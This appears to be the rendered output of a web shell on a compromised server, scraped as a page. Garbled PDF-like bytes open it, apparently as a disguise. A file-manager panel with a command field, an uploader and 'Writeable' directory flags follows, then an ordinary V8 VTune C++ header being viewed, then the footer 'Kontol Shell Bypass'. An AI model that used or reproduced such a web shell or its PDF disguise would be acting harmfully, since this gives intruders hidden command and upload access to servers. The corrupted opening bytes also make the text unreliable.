%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/self/root/home/ubuntu/node-v16.18.1/deps/v8/src/third_party/vtune/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/self/root/home/ubuntu/node-v16.18.1/deps/v8/src/third_party/vtune/vtuneapi.h
#ifndef __VTUNE_API_H__
#define __VTUNE_API_H__

#include <map>
#include <memory>
#include <string>
#include "third_party/ittapi/include/ittnotify.h"

class VTuneDomain {
  /* factory method to create vtune domain */
 public:
  /* create vtune domain, domain_name should be unique, if there
     already has a domain with same name, return false.
   */
  static std::shared_ptr<VTuneDomain> createDomain(const char* domain_name);

  /* destory vtune domain*/
  static void destroyDomain(const char* domain_name);

  /* get a domain */
  static std::shared_ptr<VTuneDomain> getDomain(const char* domain_name);

  /* domain interface */
 public:
  /* start a task with name, if no task name or null, use "default_task_name"*/
  bool beginTask(const char* task_name = "default_task_name");

  /* end a task, if there is no stacked task, return false*/
  void endTask();

 public:
  virtual ~VTuneDomain() {}

 protected:
  static __itt_string_handle* getString(const char* str);

 protected:
  VTuneDomain(__itt_domain* domain) { domain_ = domain; }

 private:
  static std::map<std::string, std::shared_ptr<VTuneDomain>> domains_;
  static std::map<std::string, __itt_string_handle*> string_handlers_;

 private:
  __itt_domain* domain_;
};

#endif

Kontol Shell Bypass